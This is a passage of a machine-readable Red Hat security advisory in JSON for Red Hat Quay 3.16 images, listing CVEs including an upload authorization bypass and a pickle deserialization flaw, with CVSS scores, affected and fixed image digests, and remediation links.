            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "github.com/jackc/pgproto3/v2: github.com/jackc/pgproto3/v2: Denial of Service via malicious PostgreSQL server"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32589",
      "cwe": {
        "id": "CWE-639",
        "name": "Authorization Bypass Through User-Controlled Key"
      },
      "discovery_date": "2026-03-12T14:43:07.878000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446963"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user\u0027s in-progress image upload.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: quay: insecure direct object reference in BlobUpload",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials to the Quay registry. Unauthenticated users cannot exploit this flaw.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
        },
        {
          "category": "external",
          "summary": "RHBZ#2446963",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446963"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32589",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32589"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32589"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "mirror-registry: quay: insecure direct object reference in BlobUpload"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32590",
      "cwe": {
        "id": "CWE-502",
        "name": "Deserialization of Untrusted Data"
      },
      "discovery_date": "2026-03-12T14:43:11.443000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446964"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: remote code execution using pickle deserialization",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials. The attacker must be authenticated to the registry, either through the web interface or through a container tool such as Podman.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
